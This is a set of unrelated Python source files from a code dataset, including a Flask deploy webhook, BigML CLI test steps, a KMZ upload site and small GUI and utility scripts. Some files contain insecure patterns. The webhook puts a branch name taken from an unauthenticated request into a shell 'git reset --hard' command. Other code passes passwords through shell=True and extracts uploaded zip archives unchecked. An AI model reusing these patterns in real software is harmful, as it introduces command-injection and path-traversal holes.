+{"seq_id":"607508437","text":"import wx\nfrom wx.lib.filebrowsebutton import FileBrowseButton\nimport yaml\nimport time\nimport os\nimport threading\n\nclass AudioPlayer(threading.Thread):\n    \"\"\"wx.Sound().Play segfaults when run from a thread, so we're punting;\n    just call run directly.\"\"\"\n    def __init__(self, frame, files):\n        threading.Thread.__init__(self)\n        self.parent = frame\n        self.files = files\n\n    def run(self):\n        \"\"\"Loop over each file/directive and play back.\"\"\"\n        for filename in self.files:\n            if filename.lower().startswith(\"pause \"):\n                secs = float(filename.split(\" \")[1])\n                self.parent.SetStatusText(\"Playing: %s\" % filename)\n                time.sleep(secs)\n                continue\n            elif filename.lower().startswith(\"concat \"):\n                AudioPlayer(self.parent, self.parent.data[filename.split(\" \", 1)[1]]).run()\n                continue\n\n            if not os.path.exists(filename):\n                filename = os.path.join(os.path.dirname(self.parent.fbb.GetValue()), filename)\n            \n            self.parent.SetStatusText(\"Playing: %s\" % filename)\n            \n            if not os.path.exists(filename):\n                self.parent.SetStatusText(\"File not found: %s\" % filename)\n                return\n\n            sound = wx.Sound(filename)\n            if sound.IsOk():\n                sound.Play(wx.SOUND_SYNC)\n            else:\n                wx.MessageBox(\"Invalid sound file: %s\" % filename, \"Error\")\n                return\n        self.parent.SetStatusText(\"Done.\")\n    \n\nclass MyFrame(wx.Frame):\n    def __init__(self):\n        wx.Frame.__init__(self, None, title=\"Audio Lab\",size=(800,100))\n        p = wx.Panel(self)\n\n        self.fbb = FileBrowseButton(p,labelText=\"Select audio descriptor file.\",fileMask=\"*.yaml\", changeCallback=self.OnFileSelect)\n        btn = wx.Button(p, -1, \"Play\")\n        self.Bind(wx.EVT_BUTTON, self.OnPlaySound, btn)\n        self.play = btn\n        self.choices = wx.Choice(p)\n        self.data = {}\n        \n        sizer = wx.BoxSizer(wx.HORIZONTAL)\n        sizer.Add(self.fbb, 1, wx.ALIGN_CENTER_VERTICAL)\n        sizer.Add(self.choices, 0, wx.ALIGN_CENTER_VERTICAL)\n        sizer.Add(btn, 0, wx.ALIGN_CENTER_VERTICAL)\n        border = wx.BoxSizer(wx.VERTICAL)\n        border.Add(sizer, 0, wx.EXPAND|wx.ALL, 15)\n        p.SetSizer(border)\n        self.CreateStatusBar()\n\n    def OnPlaySound(self, evt):\n        self.data = self._reloadData()\n        data = self.data.get(self.choices.GetStringSelection())\n        if not data:\n            return\n\n        player = AudioPlayer(self, data)\n        player.run()\n\n    def OnFileSelect(self, evt):\n        self.data = self._reloadData()\n        self.choices.Clear()\n        for k in self.data.keys():\n            self.choices.Append(k)\n        self.choices.SetSelection(0)\n\n    def _reloadData(self):\n        filename = self.fbb.GetValue()\n        return yaml.safe_load(open(filename))\n    \n\n    \napp = wx.PySimpleApp()\nfrm = MyFrame()\nfrm.Show()\napp.MainLoop()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"539722194","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2020 BigML\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nimport os\nimport time\nimport json\nfrom bigmler.tests.world import world\nfrom subprocess import check_call, CalledProcessError\nfrom bigml.api import check_resource\nfrom bigml.io import UnicodeReader\nfrom bigmler.checkpoint import file_number_of_lines\nfrom bigmler.utils import storage_file_name, open_mode\nfrom bigmler.tests.common_steps import check_debug\nfrom nose.tools import ok_, assert_equal, assert_not_equal\n\n\ndef shell_execute(command, output, test=None, options=None,\n test_rows=None, project=True):\n \"\"\"Excute bigmler command in shell\n\n \"\"\"\n command = check_debug(command, project=project)\n world.directory = os.path.dirname(output)\n world.folders.append(world.directory)\n try:\n retcode = check_call(command, shell=True)\n if retcode < 0:\n assert False\n else:\n if test is not None:\n world.test_lines = file_number_of_lines(test)\n if options is None or \\\n options.find('--projection-header') == -1:\n # test file has headers in it, so first line must be ignored\n world.test_lines -= 1\n elif test_rows is not None:\n world.test_lines = test_rows\n if options is not None and \\\n options.find('--projection-header') > -1:\n world.test_lines += 1\n elif options is not None and \\\n options.find('--projection-header') > -1:\n world.test_lines += 1\n world.output = output\n except (OSError, CalledProcessError, IOError) as exc:\n assert False, str(exc)\n\n#@step(r'I create BigML external connection using \"(.*)\", \"(.*)\", \"(.*)\", \"(.*)\", \"(.*)\", \"(.*)\" and \"(.*)\" and log files in \"(.*)\"$')\ndef i_create_external_connector(step, name=None, source=None, host=None,\n port=None, database=None, user=None,\n password=None ,output_dir=None):\n ok_(name is not None and source is not None and host is not None and\n port is not None and database is not None and user is not None and\n password is not None and output_dir is not None)\n command = (\"bigmler connector --name \\\"\" + name +\n \"\\\" --host \" + host +\n \" --port \" + port +\n \" --database \" + database +\n \" --user \" + user +\n \" --password \" + password +\n \" --engine \" + source +\n \" --store --output-dir \" + output_dir)\n shell_execute(command, \"%s/x\" % output_dir)\n\n\n#@step(r'I check that the external connection is ready')\ndef i_check_external_connector(step):\n connector_file = \"%s%sexternal_connector\" % (world.directory, os.sep)\n try:\n connector_file = open(connector_file, \"r\")\n connector = check_resource(connector_file.readline().strip(),\n world.api.get_external_connector)\n world.external_connectors.append(connector['resource'])\n world.external_connector = connector\n connector_file.close()\n except Exception as exc:\n assert False, str(exc)\n\n\n\n#@step(r'I update the external connection to \"(.*)\" and logs to \"(.*)\"$')\ndef i_update_external_connector(step, name=None, output_dir=None):\n ok_(name is not None and output_dir is not None)\n command = (\"bigmler connector --external-connector \" +\n world.external_connector[\"resource\"] +\n \" --name \\\"\" + name + \"\\\"\" + \" --output-dir \" + output_dir)\n shell_execute(command, \"%s/x\" % output_dir)\n\n\n#@step(r'I check that the external connection is ready')\ndef i_check_external_connector_name(step, name=None):\n ec_name = world.external_connector.get( \\\n \"object\", world.external_connector).get(\"name\")\n assert_equal(ec_name, 
name)\n","sub_path":"bigmler/tests/external_connector_steps.py","file_name":"external_connector_steps.py","file_ext":"py","file_size_in_byte":4451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"263425594","text":"import re\nimport datetime\nimport json\nimport subprocess\nfrom flask import request\nfrom app import aws_ext, dbm_ext, infra_ext, docker_ext\nfrom app.tasks import run_command, exec_commands, docker_message, git_message, send_socket_message\n\nfrom . import webhook\n\n'''\n{\n    \"repo_full\" : \"e-gob/traspaso-l54\",\n    \"branch\" : {\n        \"master\" : {\n            \"path\" : \"/storage/APP_GENERAL/www/docker/traspaso\"\n        },\n        \"devel\" : {\n            \"path\" : \"/storage/APP_GENERAL/www/docker/traspaso-devel\"\n        }\n    },\n    \"last_update\" : ISODate(\"2017-10-19T19:27:56.983+0000\")\n}\n'''\n\n\n@webhook.route('/commit', methods=['POST'])\ndef git_commit():\n    '''\n    Function: git commit\n    Summary: Receives the JSON payload GitHub sends on each commit\n    Examples: POST HTTP/1.1 { \"json\":\"json\"}\n    Attributes:\n    Returns:\n    '''\n    #try:\n    # Parse the commit payload from GitHub\n    git_json = json.loads(request.data)\n    #if git_json['zen']:\n    #    return \"True\"\n    # Get the repository name\n    repo_full = git_json['repository']['full_name']\n    # Get the branch (\"ref\":\"refs/heads/devel\")\n    branch = git_json['ref'].split('/')[2]\n    # Deploy\n    path = dbm_ext.obtain_path_deploy_code(repo_full, branch)\n    # Celery tasks\n    command = f'cd {path} && git fetch --all && git reset --hard origin/{branch}'\n    print(command)\n    task_command = send_socket_message.apply_async(args=[command])\n    # task_command = run_command.apply_async(args=[command])\n    while task_command.status == 'PENDING':\n        pass\n    task_id = container_name = None\n    run_commands = dbm_ext.obtain_deploy_image(repo_full)\n    if run_commands:\n        deploy_image = run_commands['image_deploy']\n        commands = run_commands['commands']\n        task = exec_commands.apply_async(args=[deploy_image, commands, path])\n        task_id = task.id\n\n    restart_docker = dbm_ext.obtain_container_name(repo_full)\n    if restart_docker:\n        container_name = restart_docker['container_name']\n\n    auto_scaling_grp = [re.findall('/storage/(.*?)/www', path, re.DOTALL)[0]]\n    payload = {'message': 'git', 'repo_full': repo_full, 'branch': branch, 'storage_path': path, 'container_name': container_name}\n    print(payload)\n    git_message.apply_async(args=[auto_scaling_grp, payload, task_id])\n    # Update the repo's last-modified date\n    dbm_ext.update_github_deploy(repo_full, datetime.datetime.now())\n    # Log the change date in the DB\n    commit = {\"repo_full\": repo_full, \"branch\": branch, \"datetime\": datetime.datetime.now()}\n    dbm_ext.log_commit_github(commit)\n    return \"True\"\n    #except:\n    #    return \"True\"\n\n\n@webhook.route('/commit_docker', methods=['POST'])\ndef docker_commit():\n    '''\n    Function: docker commit\n    Summary: Receives the JSON payload Docker Hub sends on each push\n    Examples: POST HTTP/1.1 { \"json\":\"json\"}\n    Attributes:\n    Returns:\n    '''\n    tag = json.loads(request.data)['push_data']['tag']\n    pusher = json.loads(request.data)['push_data']['pusher']\n    repo_name = json.loads(request.data)['repository']['repo_name']\n    # Keep the list of images up to date\n    dbm_ext.update_docker_image_info(repo_name, tag, datetime.datetime.now(), pusher)\n    # Update the change date in the DB\n    commit = {\"tag\": tag, \"pusher\": pusher, \"datetime\": datetime.datetime.now(), \"repo_name\": repo_name}\n    dbm_ext.log_commit_docker(commit)\n    auto_scaling_grp = dbm_ext.obtain_auto_scaling_grp(repo_name)\n    payload = {'message': 'docker', 'repo_image': repo_name, \"tag\": tag}\n    if auto_scaling_grp:\n        docker_message.apply_async(args=[auto_scaling_grp, payload])\n    return \"True\"\n\n\n@webhook.route('/obtain-docker-tag', methods=['GET'])\ndef obtain_tag_image_docker():\n    '''\n    Function: obtain tag image\n    Summary: Returns the latest Docker image tag for the given repo\n    Examples: GET HTTP/1.1 ?repo=...\n    Attributes:\n    Returns:\n    '''\n    try:\n        repo = str(request.args.get('repo'))\n        tag = dbm_ext.obtain_last_tag_docker_image(repo)\n        return str(tag)\n    except:\n        return \"ERROR\"\n\n\n@webhook.route('/obtain-last-update-github', methods=['GET'])\ndef obtain_last_github_commit():\n    '''\n    Function: obtain last github commit\n    Summary: Returns the timestamp of the last GitHub commit for the given repo\n    Examples: GET HTTP/1.1 ?repo=...\n    Attributes:\n    Returns:\n    '''\n    try:\n        repo = str(request.args.get('repo'))\n        timestamp = dbm_ext.obtain_last_github_commit(repo)\n        import time\n        return str(int(time.mktime(timestamp.timetuple())))\n    except:\n        return \"ERROR\"","sub_path":"app/webhook/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"467157492","text":"from selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import (NoSuchElementException,\n\t\tStaleElementReferenceException)\n\nclass UploadFileForm():\n\n\tdef __init__(self, driver):\n\t\tself.driver = driver\n\n\tdef load(self):\n\t\tself.container = self.driver.find_element_by_class_name('modal-content')\n\t\tbuttons = self.container.find_elements_by_tag_name('button')\n\n\t\tself.close_button = buttons[0]\n\n\t\tupload_file_div = self.container.find_element_by_class_name('dropzone_div')\n\n\t\tself.continue_button = buttons[1]\n\t\tself.cancel_button = buttons[2]\n\t\t\n\t\treturn self.validate()\n\n\tdef validate(self):\n\t\tfailures = []\n\t\tif self.continue_button.text != 'CONTINUE':\n\t\t\tfailures.append('NewAccountPopUpForm: Unexpected continue button text: \"' + self.continue_button.text + '\"')\n\t\tif self.cancel_button.text != 'CANCEL':\n\t\t\tfailures.append('NewAccountPopUpForm: Unexpected cancel button text: \"' + self.cancel_button.text + '\"')\n\t\tif len(failures) > 0:\n\t\t\tfor failure in failures:\n\t\t\t\tprint(failure)\n\t\t\treturn False\n\t\t\t# raise NoSuchElementException('Failed to load PopUpForm')\n\t\treturn True\n\n\tdef confirm(self, action='continue'):\n\t\tif action == 'continue':\n\t\t\tself.continue_button.click()\n\t\telse: \n\t\t\tself.cancel_button.click()\n\t\treturn True\n\n","sub_path":"Components/uploadFileForm.py","file_name":"uploadFileForm.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"328523790","text":"import random\n\n\ndef findalbum(arg1, arg2):\n    # searching for an album using arg1 in a place defined in arg2\n    if str(arg1).lower() in str(arg2).lower():\n        print(line[0][0], '-', line[0][1])\n\n\ndef findartist(arg1, arg2):\n    # searching for artist using arg1 in a place defined in arg2\n    if str(arg1).lower() in str(arg2).lower():\n        print(line[0][0], '(' + line[0][1] + ')')\n\n\nwith open('music.csv', 'r') as file1:\n    music1 = file1.readlines()\n    print(music1)\nmusic = []\nfor line in music1:\n    line = tuple(line.split(' | '))\n    name = (line[0], line[1])\n    information = (int(line[2]), line[3],
line[4])\n line = (name, information)\n music.append(line)\n #artist - line[0][0]\n #album - line[0][1]\n #year - line[1][0]\n #genre - line[1][1]\n #length - line[1][2]\nprint(music) # developers option\nrepeatmain = 1\nwhile repeatmain == 1:\n option = input(\"\"\"\\nWelcome in the CoolMusic! Choose the action:\n 1) Add new album\n 2) Find albums by artist\n 3) Find albums by year\n 4) Find musician by album\n 5) Find albums by letter(s)\n 6) Find albums by genre\n 7) Calculate the age of all albums\n 8) Choose a random album by genre\n 9) Show the amount of albums by an artist *\n 10) Find the longest-time album *\n 0) Exit\\n\"\"\")\n if option == '1':\n artist = input(\"Add artist's name: \")\n album = input(\"Add the name of the album: \")\n\n again = 0\n while again == 0:\n try:\n year = int(input(\"Enter album's release year: \"))\n again = 1\n except BaseException:\n print(\"Thats not a correct format, try again: \")\n\n genre = input(\"Type genre of the album: \")\n length = input(\"Enter lenght of the album [mm:ss]: \")\n newline = ((artist, album), (year, genre, length))\n music.append(newline)\n print(music)\n\n with open('music.csv', 'w') as file2:\n for line in music:\n file2.write(line[0][0] +\n ' | ' +\n line[0][1] +\n ' | ' +\n str(line[1][0]) +\n ' | ' +\n line[1][1] +\n ' | ' +\n line[1][2])\n\n elif option == '2':\n artist = input('Enter artist/band name: ')\n for line in music:\n findalbum(artist, line[0][0])\n elif option == '3':\n year = input('Enter year of release: ')\n for line in music:\n findalbum(year, line[1][0])\n elif option == '4':\n album = input('Enter name (or a part) of an album: ')\n for line in music:\n findartist(album, line[0][1])\n elif option == '5':\n letters = input('Enter letter(s): ')\n for line in music:\n findalbum(letters, line[0][1])\n elif option == '6':\n genre = input('Enter genre: ')\n for line in music:\n findalbum(genre, line[1][1])\n elif option == '7':\n age = 0\n for line in music:\n age1 = 2017 - line[1][0]\n age += age1\n print('The sum of albums age is: ' + str(age))\n elif option == '8':\n genre = input('Choose genre of album: ')\n genrealbums = []\n for line in music:\n if genre.lower() in line[1][1].lower():\n genrealbums.append(line)\n randomline = random.choice(genrealbums)\n print(str(randomline[0][1]), '-', str(randomline[1][1]))\n elif option == '9':\n artist = input('Enter artist/band name: ')\n i = 0\n for line in music:\n if artist.lower() == line[0][0].lower():\n i += 1\n if i > 0:\n print('Numer of artists albums in database: ' + str(i))\n else:\n print('There is no such artist in our database')\n elif option == '10':\n longest = 0\n for line in music:\n length = line[1][2].rstrip()\n length = int(length.replace(':', ''))\n if length > longest:\n longest = length\n longestalbum = line[0][1]\n print('Longest album in our database is ' + str(longestalbum))\n elif option == '0':\n repeatmain = 0\n else:\n print('Wrong pick, try again!!')\n","sub_path":"music_compiler.py","file_name":"music_compiler.py","file_ext":"py","file_size_in_byte":4514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"425574118","text":"import os, json, boto, requests, zipfile, re, pdb\nfrom boto.s3.key import Key\nfrom flask import Flask, flash, request, render_template, url_for, redirect, make_response, send_from_directory, flash\nfrom werkzeug import secure_filename\n\nfrom flask.ext.heroku import Heroku\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom pykml import 
parser\n\n#----------------------------------------\n# initialization\n#----------------------------------------\n\napp = Flask(__name__)\nheroku = Heroku(app)\ndb = SQLAlchemy(app)\n\napp.config.update(\n DEBUG = True,\n # For local development, put in your own user name\n # SQLALCHEMY_DATABASE_URI = 'postgres://hackyourcity@localhost/planit'\n)\n\napp.config.setdefault('AWS_ACCESS_KEY_ID', os.environ.get('AWS_ACCESS_KEY_ID'))\napp.config.setdefault('AWS_SECRET_ACCESS_KEY', os.environ.get('AWS_SECRET_ACCESS_KEY'))\napp.config.setdefault('S3_BUCKET_NAME', os.environ.get('S3_BUCKET_NAME'))\n\n\n#----------------------------------------\n# models\n#----------------------------------------\n\nclass ThreeDeeModel(db.Model):\n\tid = db.Column(db.Integer, primary_key=True)\n\tname = db.Column(db.Unicode, unique=True)\n\tdescription = db.Column(db.Unicode)\n\tlocalpath = db.Column(db.Unicode)\n\tlatitude = db.Column(db.Unicode)\n\tlongitude = db.Column(db.Unicode)\n\ts3_url = db.Column(db.Unicode)\n\n\tdef __init__(self, name, description, localpath):\n\t\tself.name = name\n\t\tself.description = description\n\t\tself.localpath = localpath\n\n\tdef open_model(self):\n\t\tz = zipfile.ZipFile(self.localpath)\n\t\tz.extractall()\n\n\tdef get_lat_lon_from_model(self):\n\t\tkml = open('/tmp/doc.kml','r').read()\n\t\tmatch = re.search('(.*)', kml)\n\t\tself.latitude = match.group(1)\n\t\tmatch = re.search('(.*)', kml)\n\t\tself.longitude = match.group(1)\n\n\tdef upload_to_s3(self):\n\t\tconn = boto.connect_s3()\n\t\tmybucket = conn.get_bucket('planit-impact-models') # Substitute in your own bucket name\n\t\tk = Key(mybucket)\n\t\tk.key = self.name\n\t\tk.set_contents_from_filename(self.localpath)\n\t\tconn.close()\n\t\tself.s3_url = 'https://s3.amazonaws.com/planit-impact-models/'+self.name\n\n#----------------------------------------\n# controllers\n#----------------------------------------\n\n@app.route(\"/\")\n@app.route(\"/index\")\n@app.route(\"/index.html\")\ndef index():\n return render_template('index.html')\n\n@app.route(\"/about\")\n@app.route(\"/about.html\")\ndef about():\n return render_template('about.html')\n\n@app.route(\"/features\")\n@app.route(\"/features.html\")\ndef features():\n return render_template('features.html')\n\n@app.route(\"/howitworks\")\n@app.route(\"/howitworks.html\")\ndef howitworks():\n return render_template('howitworks.html')\n\n@app.route(\"/demo\", methods=['GET', 'POST'])\n@app.route(\"/demo.html\", methods=['GET', 'POST'])\ndef demo():\n\tif request.method == 'POST':\n\t\tfile = request.files['file']\n\t\tif '.kmz' in file.filename:\n\t\t\tfilename = secure_filename(file.filename)\n\t\t\tfilepath = '/tmp/'+filename\n\t\t\tfile.save(filepath)\n\t\t\tdescription = request.form['description']\n\n\t\t\tmodel = ThreeDeeModel(filename,description,filepath)\n\t\t\tmodel.get_lat_lon_from_model()\n\t\t\tmodel.upload_to_s3()\n\n\t\t\tdb.session.add(model)\n\t\t\tdb.session.commit()\n\t\telse:\t \n\t\t\tflash('Only kmz files allowed.') # Still needs a template to make use of this.\n\t\n\tall_models = ThreeDeeModel.query.all()\n\n\treturn render_template('demo.html', all_models=all_models)\n\n@app.route(\"//report/explore\")\ndef report(model_name):\n\tmodel = ThreeDeeModel.query.filter_by(name=model_name).first()\n\treturn render_template('explore.html', model=model)\n\nif __name__ == \"__main__\":\n 
app.run()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"308383090","text":"# -*- coding: utf-8 -*-\n# MegEngine is Licensed under the Apache License, Version 2.0 (the \"License\")\n#\n# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nDEFAULT_BRANCH_NAME = \"master\"\nHUBCONF = \"hubconf.py\"\nHUBDEPENDENCY = \"dependencies\"\nDEFAULT_GIT_HOST = \"github.com\"\nENV_MGE_HOME = \"MGE_HOME\"\nENV_XDG_CACHE_HOME = \"XDG_CACHE_HOME\"\nDEFAULT_CACHE_DIR = \"~/.cache\"\nDEFAULT_PROTOCOL = \"HTTPS\"\nHTTP_READ_TIMEOUT = 120\n","sub_path":"imperative/python/megengine/hub/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"564346683","text":"from tkinter import *\nimport random\n\ndef click():\n    num = random.randint(1,6)\n    answer[\"text\"] = num\n\nwindow = Tk()\nwindow.title(\"Dice - Dice\")\nwindow.geometry(\"100x120\")\n\nbutton1 = Button(text = \"Test your luck!\", command = click)\nbutton1.place(x = 20, y = 45, width = 80, height = 20)\n\nanswer = Message(text = \"\")\nanswer.place(x = 40, y = 80, width = 40, height = 20)\n\nwindow.mainloop()","sub_path":"Ejercicio_N125.py","file_name":"Ejercicio_N125.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"171623122","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 19 22:04:58 2021\n\n@author: Amund\n\"\"\"\nimport string\ndef getAvailableLetters(lettersGuessed):\n    '''\n    lettersGuessed: list, what letters have been guessed so far\n    returns: string, comprised of letters that represents what letters have not\n    yet been guessed.\n    '''\n    alp = string.ascii_lowercase\n    available = \"\"\n    for letter in alp:\n        if letter not in lettersGuessed:\n            available += letter\n    return available\nlettersGuessed = ['e', 'i', 'k', 'p', 'r', 's']\nprint(getAvailableLetters(lettersGuessed))\n \n \n\n ","sub_path":"EDx Python/Problem Sets/U3PS3-Problem3NotOneLine.py","file_name":"U3PS3-Problem3NotOneLine.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"266067376","text":"import smtplib\nfrom email.mime.text import MIMEText\nfrom email.header import Header\nimport difflib\nimport time\nimport os\n\n\nclass LogFiff(object):\n\n    def __init__(self, path, nowtime):\n        self.path = path\n        self.nowtime = nowtime\n\n    def read_file(self):\n        path1 = self.path + '/correct_log/'\n        path2 = self.path + '/to_diff_log/'\n        text_a = open(path1 + os.listdir(path1)[0]).readlines()\n        text_b = open(path2 + os.listdir(path2)[0]).readlines()\n        diff_rs = difflib.HtmlDiff()\n        diff_result = diff_rs.make_file(text_a, text_b, context=True)\n        return diff_result\n\n    def send_email(self):\n        sender = 'sender@qq.com'\n        password = 'pwd'\n        receivers = 'receiver@qq.com'\n        mail_msg = LogFiff.read_file(self)\n        with open(self.nowtime + '_result.html', 'w') as writein:\n            writein.write(mail_msg)\n        message = MIMEText(mail_msg, 'html', 'utf-8')\n        subject = self.nowtime + '_log test'\n        message['Subject'] = Header(subject, 'utf-8')\n        message['From'] = Header('python_autotest', 'utf-8')\n\n        try:\n            smtpObj = smtplib.SMTP_SSL('smtp.qq.com', 465)\n            smtpObj.login(sender, password)\n            smtpObj.sendmail(sender, receivers, message.as_string())\n            smtpObj.quit()\n        except smtplib.SMTPException:\n            print('error')\n\n\nif __name__ == '__main__':\n    path = os.getcwd()\n    nowtime = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n    s = LogFiff(path, nowtime)\n    s.send_email()","sub_path":"Diff_Log/android_log.py","file_name":"android_log.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"286382350","text":"import config\n\nclass View(object):\n\tdef __init__(self,path):\n\t\tself.__path = path\n\t\t\n\tdef render(self,vardict):\n\t\ttemplate_type = config.config['view']['template_type']\n\t\ttemplate_folder = 'app/template'\n\t\ttemplate_filepath = '%s.html'%self.__path \n\t\tif 'mako' == template_type:\n\t\t\tfrom mako.template import Template\n\t\t\tfrom mako.lookup import TemplateLookup\n\t\t\tmylookup = TemplateLookup(\n\t\t\t\tdirectories=[ template_folder ],\n\t\t\t\tinput_encoding='utf-8',\n\t\t\t\toutput_encoding='utf-8',\n\t\t\t\tencoding_errors='replace'\n\t\t\t)\n\t\t\tmytemplate = mylookup.get_template( template_filepath )\n\t\t\treturn mytemplate.render_unicode(**vardict)\n\t\telif 'jinja2' == template_type:\n\t\t\timport jinja2\n\t\t\tenv = jinja2.Environment(loader = jinja2.FileSystemLoader('app/template'))\n\t\t\ttemplate = env.get_template(template_filepath)\n\t\t\t\n\t\t\tdef do(a):\n\t\t\t\treturn ''\n\t\t\tvardict['do'] = do\n\t\t\treturn template.render(**vardict)\n","sub_path":"drape/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"629040637","text":"#!/usr/bin/python2\n# -*- coding: utf-8 -*-\n\nimport redis\n# https://plyvel.readthedocs.org\nimport plyvel as leveldb\nimport os\nimport ast\nimport time\nimport simplejson as json\n\nimport common\nimport logging\nimport config\nfrom itertools import islice\n\n\"\"\"\nRedis DB layout:\n- hash initv: momentary sensor readings\n- channel nodes (default) - pubsub\n- hash status: momentary relay states\n\"\"\"\n\n\nclass redisdb():\n\n    \"\"\"Temporary data\"\"\"\n    def __init__(self, debug=True):\n        self.initdb()\n        self.debug = debug\n\n    def initdb(self, host=\"localhost\", port=6379):\n        self.rdb = redis.Redis(host, port)\n\n    def pubsub(self, data, channel='nodes'):\n        if data:\n            data_str = json.dumps(data)\n            self.rdb.set(\"initv\", data) # name, value\n            self.rdb.publish(channel, data) # channel, value\n            if self.debug:\n                logging.debug('Data publish on channel')\n                logging.debug('Submit init values')\n\n    def setStatus(self, msg):\n        \"\"\"{\"name\": \"relaynode\", \"status\": 0, \"cmd\": 1}\"\"\"\n        jmsg = json.loads(msg)\n        self.rdb.hset('status', jmsg['name'] + \"_\" + str(jmsg['cmd']), str(msg))\n\n    def getStatus(self, nodename):\n        return self.rdb.hget(\"status\", nodename)\n\n\nclass history():\n\n    '''Store data in base for future use, i.e.
graphs'''\n def __init__(self, path, dbname):\n self.path = path\n self.dbname = dbname\n #self.create_db = create_db\n\n dirname = self.path + \"/\" + self.dbname\n\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n\n self.lvldb = leveldb.DB(\"%s/%s\" % (self.path,\n self.dbname),\n create_if_missing=True)\n self.dbconnected = True\n\n def is_connected(self):\n return self.dbconnected\n\n def get(self, nodename, timerange):\n\n ranges = {'1h' : 3600,\n '8h' : 28000,\n 'day' : 86400,\n '2d': 172800,\n '3d': 259200,\n '4d': 345600,\n '5d': 432000,\n 'week' : 604800,\n '2w' : (2 * 604800),\n '3w' : (3 * 604800),\n 'month' : 2592000,\n '2m' : (5184000),\n '3m' : (7776000),\n '4m' : (7776000 + 2592000),\n '5m' : (7776000 + 2592000 + 2592000),\n '6m' : (15552000),\n '7m' : (15552000 + 2592000),\n '8m' : (15552000 + 2592000 + 2592000),\n '9m' : (15552000 + 2592000 + 2592000 + 2592000),\n 'year' : (31104000)}\n\n if self.dbconnected:\n data = []\n ts = int(time.time())\n start_key = '%s-%s' % (nodename, ts-ranges[timerange])\n stop_key = '%s-%s' % (nodename, ts)\n \n iterator = self.lvldb.iterator(start=(start_key).encode('ascii'),\n stop=(stop_key).encode('ascii'),\n include_start=True,\n include_stop=True)\n \n data = [value for key, value in iterator]\n \n iterator.close()\n if (ts - ranges[timerange]) > (ts - 604900):\n #print 'week'\n return data\n elif(ts - ranges[timerange]) < (ts - 604900) and (ts - ranges[timerange]) > (ts - 2593000):\n data_filtered = [value for value in (islice(data,0,len(data), 10))]\n #print 'month - 3month'\n return data_filtered\n elif (ts - ranges[timerange]) < (ts - 2593000):\n #print 'above 3month'\n data_filtered = [value for value in (islice(data,0,len(data), 100))]\n return data_filtered\n def put(self, key, value):\n if self.dbconnected:\n self.lvldb.put(key, value)\n \n \n def pritndb(self,node):\n \n if self.dbconnected:\n imput = node\n file = open(\"/mnt/data/\"+imput+\"_data_node.log\", \"w\")\n for key, value in self.lvldb.iterator(prefix=imput):\n file.write (value)\n file.write(\"\\n\")\n file.close() \n \n return \"all database dumped to: /mnt/data/....data_node.log node: %s\" % imput\n \n def closeconnectdb(self):\n return self.lvldb.close()\n \n def get_toJSON(self, nodename, sensor, timerange='1h'):\n data = []\n if self.dbconnected:\n values = self.get(nodename, timerange)\n # milliseconds for JavaScript\n data = ([[ast.literal_eval(v)['timestamp'] * 1000,ast.literal_eval(v)[sensor]] for (v) in values])\n \n return data\n \n \n def get_toJSON_last(self, nodename, sensor, timerange='day'):\n data = []\n if self.dbconnected:\n values = self.get(nodename, timerange)\n # milliseconds for JavaScript\n #data = [[ast.literal_eval(v)['timestamp'] *1000, ast.literal_eval(v)[sensor]] for v in values]\n data = [ ast.literal_eval(v)[sensor] for (v) in values]\n \n return data[-1], data[0]\n","sub_path":"sensnode/store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":5296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"350149807","text":"import sys\nimport time\nimport logging\n\n# https://github.com/gorakhargosh/watchdog#example-api-usage\nfrom watchdog.observers import Observer\nfrom watchdog.events import LoggingEventHandler\n\nfrom subprocess import call\n\nclass PyHandler(LoggingEventHandler):\n def dispatch(self, event):\n if event.src_path.lower().endswith('.py'):\n print(\"(compile.py) recompiling...\")\n call([\"python\", \"compile.py\"])\n\n\nclass 
